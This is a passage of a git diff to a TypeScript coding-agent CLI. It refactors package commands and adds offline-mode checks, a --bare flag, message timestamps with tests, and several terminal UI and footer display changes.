-		if (arg.startsWith("-")) {
-			invalidOption = invalidOption ?? arg;
-			continue;
-		}
-
-		if (!source) {
-			source = arg;
-		}
-	}
-
-	return { command, source, local, help, invalidOption };
-}
-
-async function handlePackageCommand(args: string[]): Promise<boolean> {
-	const options = parsePackageCommand(args);
-	if (!options) {
-		return false;
-	}
-
-	if (options.help) {
-		printPackageCommandHelp(options.command);
-		return true;
-	}
-
-	if (options.invalidOption) {
-		console.error(chalk.red(`Unknown option ${options.invalidOption} for "${options.command}".`));
-		console.error(chalk.dim(`Use "${APP_NAME} --help" or "${getPackageCommandUsage(options.command)}".`));
-		process.exitCode = 1;
-		return true;
-	}
-
-	const source = options.source;
-	if ((options.command === "install" || options.command === "remove") && !source) {
-		console.error(chalk.red(`Missing ${options.command} source.`));
-		console.error(chalk.dim(`Usage: ${getPackageCommandUsage(options.command)}`));
-		process.exitCode = 1;
-		return true;
-	}
-
-	const cwd = process.cwd();
-	const agentDir = getAgentDir();
-	const settingsManager = SettingsManager.create(cwd, agentDir);
-	reportSettingsErrors(settingsManager, "package command");
-	const packageManager = new DefaultPackageManager({ cwd, agentDir, settingsManager });
-
-	packageManager.setProgressCallback((event) => {
-		if (event.type === "start") {
-			process.stdout.write(chalk.dim(`${event.message}\n`));
-		}
-	});
-
-	try {
-		switch (options.command) {
-			case "install":
-				await packageManager.install(source!, { local: options.local });
-				packageManager.addSourceToSettings(source!, { local: options.local });
-				console.log(chalk.green(`Installed ${source}`));
-				return true;
-
-			case "remove": {
-				await packageManager.remove(source!, { local: options.local });
-				const removed = packageManager.removeSourceFromSettings(source!, { local: options.local });
-				if (!removed) {
-					console.error(chalk.red(`No matching package found for ${source}`));
-					process.exitCode = 1;
-					return true;
-				}
-				console.log(chalk.green(`Removed ${source}`));
-				return true;
-			}
-
-			case "list": {
-				const globalSettings = settingsManager.getGlobalSettings();
-				const projectSettings = settingsManager.getProjectSettings();
-				const globalPackages = globalSettings.packages ?? [];
-				const projectPackages = projectSettings.packages ?? [];
-
-				if (globalPackages.length === 0 && projectPackages.length === 0) {
-					console.log(chalk.dim("No packages installed."));
-					return true;
-				}
-
-				const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => {
-					const source = typeof pkg === "string" ? pkg : pkg.source;
-					const filtered = typeof pkg === "object";
-					const display = filtered ? `${source} (filtered)` : source;
-					console.log(`  ${display}`);
-					const path = packageManager.getInstalledPath(source, scope);
-					if (path) {
-						console.log(chalk.dim(`    ${path}`));
-					}
-				};
-
-				if (globalPackages.length > 0) {
-					console.log(chalk.bold("User packages:"));
-					for (const pkg of globalPackages) {
-						formatPackage(pkg, "user");
-					}
-				}
-
-				if (projectPackages.length > 0) {
-					if (globalPackages.length > 0) console.log();
-					console.log(chalk.bold("Project packages:"));
-					for (const pkg of projectPackages) {
-						formatPackage(pkg, "project");
-					}
-				}
-
-				return true;
-			}
-
-			case "update":
-				await packageManager.update(source);
-				if (source) {
-					console.log(chalk.green(`Updated ${source}`));
-				} else {
-					console.log(chalk.green("Updated packages"));
-				}
-				return true;
-		}
-	} catch (error: unknown) {
-		const message = error instanceof Error ? error.message : "Unknown package command error";
-		console.error(chalk.red(`Error: ${message}`));
-		process.exitCode = 1;
-		return true;
-	}
-}
-
 async function prepareInitialMessage(
 	parsed: Args,
 	autoResizeImages: boolean,
@@ -590,7 +360,16 @@ export async function main(args: string[]) {
 		process.env.PI_SKIP_VERSION_CHECK = "1";
 	}
 
-	if (await handlePackageCommand(args)) {
+	const packageCommand = await runPackageCommand({
+		appName: APP_NAME,
+		args,
+		cwd: process.cwd(),
+		agentDir: getAgentDir(),
+		stdout: process.stdout,
+		stderr: process.stderr,
+	});
+	if (packageCommand.handled) {
+		process.exitCode = packageCommand.exitCode;
 		return;
 	}
 
@@ -612,6 +391,25 @@ export async function main(args: string[]) {
 	const authStorage = AuthStorage.create();
 	const modelRegistry = new ModelRegistry(authStorage, getModelsPath());
 
+	// Offline mode validation / auto-detection
+	if (offlineMode) {
+		// --offline flag: validate all models are local
+		if (!modelRegistry.isAllLocalChain()) {
+			const remoteModel = modelRegistry.getAll().find((m) => !ModelRegistry.isLocalModel(m));
+			if (remoteModel) {
+				console.error(
+					`Error: --offline requires all configured models to be local. Found remote model: ${remoteModel.name} (${remoteModel.baseUrl || "cloud API"})`,
+				);
+				process.exit(1);
+			}
+		}
+	} else if (modelRegistry.isAllLocalChain() && modelRegistry.getAll().length > 0) {
+		// Auto-detect: all models are local, enable offline mode
+		process.env.PI_OFFLINE = "1";
+		process.env.PI_SKIP_VERSION_CHECK = "1";
+		console.log("[gsd] All configured models are local \u2014 enabling offline mode automatically.");
+	}
+
 	const resourceLoader = new DefaultResourceLoader({
 		cwd,
 		agentDir,
@@ -621,11 +419,13 @@ export async function main(args: string[]) {
 		additionalPromptTemplatePaths: firstPass.promptTemplates,
 		additionalThemePaths: firstPass.themes,
 		noExtensions: firstPass.noExtensions,
-		noSkills: firstPass.noSkills,
-		noPromptTemplates: firstPass.noPromptTemplates,
-		noThemes: firstPass.noThemes,
+		noSkills: firstPass.noSkills || firstPass.bare,
+		noPromptTemplates: firstPass.noPromptTemplates || firstPass.bare,
+		noThemes: firstPass.noThemes || firstPass.bare,
 		systemPrompt: firstPass.systemPrompt,
 		appendSystemPrompt: firstPass.appendSystemPrompt,
+		// --bare: suppress CLAUDE.md/AGENTS.md ancestor walk
+		...(firstPass.bare ? { agentsFilesOverride: () => ({ agentsFiles: [] }) } : {}),
 	});
 	await resourceLoader.reload();
 	time("resourceLoader.reload");
diff --git a/packages/pi-coding-agent/src/modes/index.ts b/packages/pi-coding-agent/src/modes/index.ts
index 205e9f54c..1e31e54e0 100644
--- a/packages/pi-coding-agent/src/modes/index.ts
+++ b/packages/pi-coding-agent/src/modes/index.ts
@@ -6,4 +6,11 @@ export { InteractiveMode, type InteractiveModeOptions } from "./interactive/inte
 export { type PrintModeOptions, runPrintMode } from "./print-mode.js";
 export { type ModelInfo, RpcClient, type RpcClientOptions, type RpcEventListener } from "./rpc/rpc-client.js";
 export { runRpcMode } from "./rpc/rpc-mode.js";
-export type { RpcCommand, RpcResponse, RpcSessionState } from "./rpc/rpc-types.js";
+export type {
+	RpcCommand,
+	RpcInitResult,
+	RpcProtocolVersion,
+	RpcResponse,
+	RpcSessionState,
+	RpcV2Event,
+} from "./rpc/rpc-types.js";
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts
new file mode 100644
index 000000000..6b918294d
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts
@@ -0,0 +1,18 @@
+// GSD-2 — Provider display name mapping tests
+import { test, describe } from "node:test";
+import assert from "node:assert/strict";
+import { providerDisplayName } from "../model-selector.js";
+
+describe("providerDisplayName", () => {
+	test("renames 'anthropic' to 'anthropic-api'", () => {
+		assert.equal(providerDisplayName("anthropic"), "anthropic-api");
+	});
+
+	test("passes through unmapped providers unchanged", () => {
+		assert.equal(providerDisplayName("claude-code"), "claude-code");
+		assert.equal(providerDisplayName("openai"), "openai");
+		assert.equal(providerDisplayName("bedrock"), "bedrock");
+		assert.equal(providerDisplayName("github-copilot"), "github-copilot");
+		assert.equal(providerDisplayName("openrouter"), "openrouter");
+	});
+});
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts
new file mode 100644
index 000000000..c5eb4ce74
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts
@@ -0,0 +1,38 @@
+import { test, describe } from "node:test";
+import assert from "node:assert/strict";
+import { formatTimestamp } from "../timestamp.js";
+
+describe("formatTimestamp", () => {
+	// Use a fixed local timestamp to avoid timezone issues
+	const d = new Date(2026, 2, 24, 10, 34, 0); // Mar 24, 2026 10:34:00 local time
+	const ts = d.getTime();
+
+	test("date-time-iso format (default)", () => {
+		assert.equal(formatTimestamp(ts, "date-time-iso"), "2026-03-24 10:34");
+		assert.equal(formatTimestamp(ts), "2026-03-24 10:34"); // default
+	});
+
+	test("date-time-us format", () => {
+		assert.equal(formatTimestamp(ts, "date-time-us"), "03-24-2026 10:34 AM");
+	});
+
+	test("US format handles PM correctly", () => {
+		const pm = new Date(2026, 2, 24, 14, 5, 0).getTime();
+		assert.equal(formatTimestamp(pm, "date-time-us"), "03-24-2026 2:05 PM");
+	});
+
+	test("US format handles noon as 12 PM", () => {
+		const noon = new Date(2026, 2, 24, 12, 0, 0).getTime();
+		assert.equal(formatTimestamp(noon, "date-time-us"), "03-24-2026 12:00 PM");
+	});
+
+	test("US format handles midnight as 12 AM", () => {
+		const midnight = new Date(2026, 2, 24, 0, 0, 0).getTime();
+		assert.equal(formatTimestamp(midnight, "date-time-us"), "03-24-2026 12:00 AM");
+	});
+
+	test("ISO format pads single digit months and days", () => {
+		const jan1 = new Date(2026, 0, 1, 9, 5, 0).getTime();
+		assert.equal(formatTimestamp(jan1, "date-time-iso"), "2026-01-01 09:05");
+	});
+});
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts
index afa0d780a..35a591c16 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts
@@ -2,7 +2,7 @@
  * Armin says hi! A fun easter egg with animated XBM art.
  */
 
-import type { Component, TUI } from "@gsd/pi-tui";
+import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui";
 import { theme } from "../theme/theme.js";
 
 // XBM image: 31x36 pixels, LSB first, 1=background, 0=foreground
@@ -88,20 +88,20 @@ export class ArminComponent implements Component {
 			return this.cachedLines;
 		}
 
-		const padding = 1;
-		const availableWidth = width - padding;
+		const center = (s: string) => {
+			const visible = visibleWidth(s);
+			const left = Math.max(0, Math.floor((width - visible) / 2));
+			return " ".repeat(left) + s;
+		};
 
 		this.cachedLines = this.currentGrid.map((row) => {
-			// Clip row to available width before applying color
-			const clipped = row.slice(0, availableWidth).join("");
-			const padRight = Math.max(0, width - padding - clipped.length);
-			return ` ${theme.fg("accent", clipped)}${" ".repeat(padRight)}`;
+			const clipped = row.slice(0, width).join("");
+			return center(theme.fg("accent", clipped));
 		});
 
 		// Add "ARMIN SAYS HI" at the end
 		const message = "ARMIN SAYS HI";
-		const msgPadRight = Math.max(0, width - padding - message.length);
-		this.cachedLines.push(` ${theme.fg("accent", message)}${" ".repeat(msgPadRight)}`);
+		this.cachedLines.push(center(theme.fg("accent", message)));
 
 		this.cachedWidth = width;
 		this.cachedVersion = this.gridVersion;
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts
index fe78c54e9..c558b7cfc 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts
@@ -1,6 +1,7 @@
 import type { AssistantMessage } from "@gsd/pi-ai";
 import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui";
 import { getMarkdownTheme, theme } from "../theme/theme.js";
+import { formatTimestamp, type TimestampFormat } from "./timestamp.js";
 
 /**
  * Component that renders a complete assistant message
@@ -10,16 +11,19 @@ export class AssistantMessageComponent extends Container {
 	private hideThinkingBlock: boolean;
 	private markdownTheme: MarkdownTheme;
 	private lastMessage?: AssistantMessage;
+	private timestampFormat: TimestampFormat;
 
 	constructor(
 		message?: AssistantMessage,
 		hideThinkingBlock = false,
 		markdownTheme: MarkdownTheme = getMarkdownTheme(),
+		timestampFormat: TimestampFormat = "date-time-iso",
 	) {
 		super();
 
 		this.hideThinkingBlock = hideThinkingBlock;
 		this.markdownTheme = markdownTheme;
+		this.timestampFormat = timestampFormat;
 
 		// Container for text/thinking content
 		this.contentContainer = new Container();
@@ -101,8 +105,6 @@ export class AssistantMessageComponent extends Container {
 						: "Operation aborted";
 				if (hasVisibleContent) {
 					this.contentContainer.addChild(new Spacer(1));
-				} else {
-					this.contentContainer.addChild(new Spacer(1));
 				}
 				this.contentContainer.addChild(new Text(theme.fg("error", abortMessage), 1, 0));
 			} else if (message.stopReason === "error") {
@@ -111,5 +113,11 @@ export class AssistantMessageComponent extends Container {
 				this.contentContainer.addChild(new Text(theme.fg("error", `Error: ${errorMsg}`), 1, 0));
 			}
 		}
+
+		// Show timestamp when the message is complete (has a stop reason)
+		if (message.stopReason && message.timestamp) {
+			const timeStr = formatTimestamp(message.timestamp, this.timestampFormat);
+			this.contentContainer.addChild(new Text(theme.fg("dim", timeStr), 1, 0));
+		}
 	}
 }
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts
index cec80e097..b35855e0f 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts
@@ -29,6 +29,7 @@ export class BashExecutionComponent extends Container {
 	private expanded = false;
 	private contentContainer: Container;
 	private ui: TUI;
+	private _borderColorKey: "dim" | "bashMode";
 
 	constructor(command: string, ui: TUI, excludeFromContext = false) {
 		super();
@@ -37,6 +38,7 @@ export class BashExecutionComponent extends Container {
 
 		// Use dim border for excluded-from-context commands (!! prefix)
 		const colorKey = excludeFromContext ? "dim" : "bashMode";
+		this._borderColorKey = colorKey;
 		const borderColor = (str: string) => theme.fg(colorKey, str);
 
 		// Add spacer
@@ -137,7 +139,7 @@ export class BashExecutionComponent extends Container {
 		this.contentContainer.clear();
 
 		// Command header
-		const header = new Text(theme.fg("bashMode", theme.bold(`$ ${this.command}`)), 1, 0);
+		const header = new Text(theme.fg(this._borderColorKey, theme.bold(`$ ${this.command}`)), 1, 0);
 		this.contentContainer.addChild(header);
 
 		// Output
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts
index d2610da96..9c4dae2d2 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts
@@ -34,8 +34,8 @@ export class BorderedLoader extends Container {
 		if (this.cancellable) {
 			this.addChild(new Spacer(1));
 			this.addChild(new Text(keyHint("selectCancel", "cancel"), 1, 0));
+			this.addChild(new Spacer(1));
 		}
-		this.addChild(new Spacer(1));
 		this.addChild(new DynamicBorder(borderColor));
 	}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts
index c7b666a2f..9c7ed9730 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts
@@ -32,7 +32,7 @@ export class BranchSummaryMessageComponent extends Box {
 	private updateDisplay(): void {
 		this.clear();
 
-		const label = theme.fg("customMessageLabel", `\x1b[1m[branch]\x1b[22m`);
+		const label = theme.fg("customMessageLabel", theme.bold("[branch]"));
 		this.addChild(new Text(label, 0, 0));
 		this.addChild(new Spacer(1));
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts
index ace738406..f7e68e259 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts
@@ -33,7 +33,7 @@ export class CompactionSummaryMessageComponent extends Box {
 		this.clear();
 
 		const tokenStr = this.message.tokensBefore.toLocaleString();
-		const label = theme.fg("customMessageLabel", `\x1b[1m[compaction]\x1b[22m`);
+		const label = theme.fg("customMessageLabel", theme.bold("[compaction]"));
 		this.addChild(new Text(label, 0, 0));
 		this.addChild(new Spacer(1));
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts
index 61f6d57dd..befee7ca6 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts
@@ -346,9 +346,14 @@ class ResourceList implements Component, Focusable {
 			}
 		}
 
-		// Scroll indicator
+		// Scroll indicator — count only selectable items (exclude group/subgroup headers)
 		if (startIndex > 0 || endIndex < this.filteredItems.length) {
-			lines.push(theme.fg("dim", `  (${this.selectedIndex + 1}/${this.filteredItems.length})`));
+			const selectableItems = this.filteredItems.filter((e) => e.type === "item");
+			const selectableTotal = selectableItems.length;
+			const selectablePosition = selectableItems.findIndex(
+				(e) => this.filteredItems.indexOf(e) === this.selectedIndex,
+			);
+			lines.push(theme.fg("dim", `  (${selectablePosition + 1}/${selectableTotal})`));
 		}
 
 		return lines;
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts
index 0f051c2f6..ef77320d3 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts
@@ -7,6 +7,7 @@ import type { TUI } from "@gsd/pi-tui";
 export class CountdownTimer {
 	private intervalId: ReturnType<typeof setInterval> | undefined;
 	private remainingSeconds: number;
+	private _disposed = false;
 
 	constructor(
 		timeoutMs: number,
@@ -18,6 +19,7 @@ export class CountdownTimer {
 		this.onTick(this.remainingSeconds);
 
 		this.intervalId = setInterval(() => {
+			if (this._disposed) return;
 			this.remainingSeconds--;
 			this.onTick(this.remainingSeconds);
 			this.tui?.requestRender();
@@ -30,6 +32,7 @@ export class CountdownTimer {
 	}
 
 	dispose(): void {
+		this._disposed = true;
 		if (this.intervalId) {
 			clearInterval(this.intervalId);
 			this.intervalId = undefined;
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts
index f3f6455fb..ba7cf9634 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts
@@ -75,7 +75,7 @@ export class CustomMessageComponent extends Container {
 		this.box.clear();
 
 		// Default rendering: label + content
-		const label = theme.fg("customMessageLabel", `\x1b[1m[${this.message.customType}]\x1b[22m`);
+		const label = theme.fg("customMessageLabel", theme.bold(`[${this.message.customType}]`));
 		this.box.addChild(new Text(label, 0, 0));
 		this.box.addChild(new Spacer(1));
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts
index e501cd435..47b87e146 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts
@@ -4,7 +4,7 @@
  * A heartfelt tribute to dax (@thdxr) for providing free Kimi K2.5 access via OpenCode.
  */
 
-import type { Component, TUI } from "@gsd/pi-tui";
+import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui";
 import { theme } from "../theme/theme.js";
 
 // 32x32 RGB image of dax, hex encoded (3 bytes per pixel)
@@ -101,7 +101,7 @@ export class DaxnutsComponent implements Component {
 		const lines: string[] = [];
 
 		const center = (s: string) => {
-			const visible = s.replace(/\x1b\[[0-9;]*m/g, "").length;
+			const visible = visibleWidth(s);
 			const left = Math.max(0, Math.floor((width - visible) / 2));
 			return " ".repeat(left) + s;
 		};
@@ -145,7 +145,8 @@ export class DaxnutsComponent implements Component {
 		lines.push("");
 		if (textPhase > 2 || this.tick >= this.maxTicks) {
 			lines.push(center(t.fg("dim", "Try OpenCode")));
-			lines.push(center(t.fg("mdLink", "https://mistral.ai/news/mistral-vibe-2-0")));
+			// URL removed — was pointing to an incorrect destination
+			lines.push(center(t.fg("mdLink", "opencode.ai")));
 		} else {
 			lines.push("");
 			lines.push("");
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts
index d575d63e3..55131b023 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts
@@ -6,7 +6,7 @@ import { theme } from "../theme/theme.js";
  * Format: "+123 content" or "-123 content" or " 123 content" or "     ..."
  */
 function parseDiffLine(line: string): { prefix: string; lineNum: string; content: string } | null {
-	const match = line.match(/^([+-\s])(\s*\d*)\s(.*)$/);
+	const match = line.match(/^([+\- ])(\s*\d*)\s(.*)$/);
 	if (!match) return null;
 	return { prefix: match[1], lineNum: match[2], content: match[3] };
 }
@@ -15,7 +15,7 @@ function parseDiffLine(line: string): { prefix: string; lineNum: string; content
  * Replace tabs with spaces for consistent rendering.
  */
 function replaceTabs(text: string): string {
-	return text.replace(/\t/g, "   ");
+	return text.replace(/\t/g, "    ");
 }
 
 /**
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts
index 60d2da9e3..a54298065 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts
@@ -11,7 +11,9 @@ import { theme } from "../theme/theme.js";
 export class DynamicBorder implements Component {
 	private color: (str: string) => string;
 
-	constructor(color: (str: string) => string = (str) => theme.fg("border", str)) {
+	constructor(color: (str: string) => string = (str) => {
+		try { return theme.fg("border", str); } catch { return str; }
+	}) {
 		this.color = color;
 	}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts
index f0a9eae8b..0b05c3ada 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts
@@ -113,6 +113,9 @@ export class ExtensionEditorComponent extends Container implements Focusable {
 	private openExternalEditor(): void {
 		const editorCmd = process.env.VISUAL || process.env.EDITOR;
 		if (!editorCmd) {
+			// No editor configured — nothing to do.
+			// The main interactive-mode handler shows a warning with an iTerm2 hint;
+			// this component is a secondary editor so we silently bail.
 			return;
 		}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts
index 06d7ee933..525bcfc06 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts
@@ -74,6 +74,7 @@ export class ExtensionInputComponent extends Container implements Focusable {
 	handleInput(keyData: string): void {
 		const kb = getEditorKeybindings();
 		if (kb.matches(keyData, "selectConfirm") || keyData === "\n") {
+			if (this.input.getValue().trim() === "") return;
 			this.onSubmitCallback(this.input.getValue());
 		} else if (kb.matches(keyData, "selectCancel")) {
 			this.onCancelCallback();
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts
index 2870aed28..e24327fc8 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts
@@ -96,6 +96,10 @@ export class ExtensionSelectorComponent extends Container {
 		if (idx < 0 || idx >= this.options.length) {
 			return Math.max(0, Math.min(from, this.options.length - 1));
 		}
+		// If all items are separators, idx may still point to one — fall back to original index
+		if (this.isSeparator(idx)) {
+			return Math.max(0, Math.min(from, this.options.length - 1));
+		}
 		return idx;
 	}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts
index 74842058e..3b28c0003 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts
@@ -2,6 +2,7 @@ import { type Component, truncateToWidth, visibleWidth } from "@gsd/pi-tui";
 import type { AgentSession } from "../../../core/agent-session.js";
 import type { ReadonlyFooterDataProvider } from "../../../core/footer-data-provider.js";
 import { theme } from "../theme/theme.js";
+import { providerDisplayName } from "./model-selector.js";
 
 /**
  * Sanitize text for display in a single-line status.
@@ -26,6 +27,18 @@ function formatTokens(count: number): string {
 	return `${Math.round(count / 1000000)}M`;
 }
 
+/**
+ * Format a cost value for compact display.
+ * Uses fewer decimal places for larger amounts.
+ * @internal Exported for testing only.
+ */
+export function formatPromptCost(cost: number): string {
+	if (cost < 0.001) return `$${cost.toFixed(4)}`;
+	if (cost < 0.01) return `$${cost.toFixed(3)}`;
+	if (cost < 1) return `$${cost.toFixed(3)}`;
+	return `$${cost.toFixed(2)}`;
+}
+
 /**
  * Footer component that shows pwd, token stats, and context usage.
  * Computes token/context stats from session, gets git branch and extension statuses from provider.
@@ -68,10 +81,14 @@ export class FooterComponent implements Component {
 		const totalCacheWrite = usageTotals.cacheWrite;
 		const totalCost = usageTotals.cost;
 
+		// Use activeInferenceModel during streaming to show the model actually
+		// being used, not the configured model which may have been switched mid-turn.
+		const displayModel = state.activeInferenceModel ?? state.model;
+
 		// Calculate context usage from session (handles compaction correctly).
 		// After compaction, tokens are unknown until the next LLM response.
 		const contextUsage = this.session.getContextUsage();
-		const contextWindow = contextUsage?.contextWindow ?? state.model?.contextWindow ?? 0;
+		const contextWindow = contextUsage?.contextWindow ?? displayModel?.contextWindow ?? 0;
 		const contextPercentValue = contextUsage?.percent ?? 0;
 		const contextPercent = contextUsage?.percent !== null ? contextPercentValue.toFixed(1) : "?";
 
@@ -94,21 +111,36 @@ export class FooterComponent implements Component {
 			pwd = `${pwd} • ${sessionName}`;
 		}
 
-		// Build stats line
-		const statsParts = [];
-		if (totalInput) statsParts.push(`↑${formatTokens(totalInput)}`);
-		if (totalOutput) statsParts.push(`↓${formatTokens(totalOutput)}`);
-		if (totalCacheRead) statsParts.push(`R${formatTokens(totalCacheRead)}`);
-		if (totalCacheWrite) statsParts.push(`W${formatTokens(totalCacheWrite)}`);
+		// Build stats line as separate groups joined by a dim middle-dot separator
+		const sep = ` ${theme.fg("dim", "\u00B7")} `;
 
-		// Show cost with "(sub)" indicator if using OAuth subscription
-		const usingSubscription = state.model ? this.session.modelRegistry.isUsingOAuth(state.model) : false;
+		// Group 1: token I/O
+		const tokenGroup: string[] = [];
+		if (totalInput) tokenGroup.push(`↑${formatTokens(totalInput)}`);
+		if (totalOutput) tokenGroup.push(`↓${formatTokens(totalOutput)}`);
+
+		// Group 2: cache metrics
+		const cacheGroup: string[] = [];
+		if (totalCacheRead) cacheGroup.push(`cr:${formatTokens(totalCacheRead)}`);
+		if (totalCacheWrite) cacheGroup.push(`cw:${formatTokens(totalCacheWrite)}`);
+
+		// Group 3: cost
+		const costGroup: string[] = [];
+		const usingSubscription = displayModel ? this.session.modelRegistry.isUsingOAuth(displayModel) : false;
 		if (totalCost || usingSubscription) {
 			const costStr = `$${totalCost.toFixed(3)}${usingSubscription ? " (sub)" : ""}`;
-			statsParts.push(costStr);
+			costGroup.push(costStr);
 		}
 
-		// Colorize context percentage based on usage
+		// Per-prompt cost annotation (opt-in via show_token_cost preference, #1515)
+		if (process.env.GSD_SHOW_TOKEN_COST === "1") {
+			const lastTurnCost = this.session.getLastTurnCost();
+			if (lastTurnCost > 0) {
+				costGroup.push(`(last: ${formatPromptCost(lastTurnCost)})`);
+			}
+		}
+
+		// Group 4: context percentage (colorized)
 		let contextPercentStr: string;
 		const autoIndicator = this.autoCompactEnabled ? " (auto)" : "";
 		const contextPercentDisplay =
@@ -122,12 +154,19 @@ export class FooterComponent implements Component {
 		} else {
 			contextPercentStr = contextPercentDisplay;
 		}
-		statsParts.push(contextPercentStr);
 
-		let statsLeft = statsParts.join(" ");
+		// Assemble groups: items within a group are space-separated,
+		// groups are separated by a dim middle-dot
+		const groups: string[] = [];
+		if (tokenGroup.length > 0) groups.push(tokenGroup.join(" "));
+		if (cacheGroup.length > 0) groups.push(cacheGroup.join(" "));
+		if (costGroup.length > 0) groups.push(costGroup.join(" "));
+		groups.push(contextPercentStr);
+
+		let statsLeft = groups.join(sep);
 
 		// Add model name on the right side, plus thinking level if model supports it
-		const modelName = state.model?.id || "no-model";
+		const modelName = displayModel?.id || "no-model";
 
 		let statsLeftWidth = visibleWidth(statsLeft);
 
@@ -142,7 +181,7 @@ export class FooterComponent implements Component {
 
 		// Add thinking level indicator if model supports reasoning
 		let rightSideWithoutProvider = modelName;
-		if (state.model?.reasoning) {
+		if (displayModel?.reasoning) {
 			const thinkingLevel = state.thinkingLevel || "off";
 			rightSideWithoutProvider =
 				thinkingLevel === "off" ? `${modelName} • thinking off` : `${modelName} • ${thinkingLevel}`;
@@ -150,8 +189,8 @@ export class FooterComponent implements Component {
 
 		// Prepend the provider in parentheses if there are multiple providers and there's enough room
 		let rightSide = rightSideWithoutProvider;
-		if (this.footerData.getAvailableProviderCount() > 1 && state.model) {
-			rightSide = `(${state.model!.provider}) ${rightSideWithoutProvider}`;
+		if (this.footerData.getAvailableProviderCount() > 1 && displayModel) {
+			rightSide = `(${providerDisplayName(displayModel.provider)}) ${rightSideWithoutProvider}`;
 			if (statsLeftWidth + minPadding + visibleWidth(rightSide) > width) {
 				// Too wide, fall back
 				rightSide = rightSideWithoutProvider;
@@ -197,8 +236,9 @@ export class FooterComponent implements Component {
 				.sort(([a], [b]) => a.localeCompare(b))
 				.map(([, text]) => sanitizeStatusText(text));
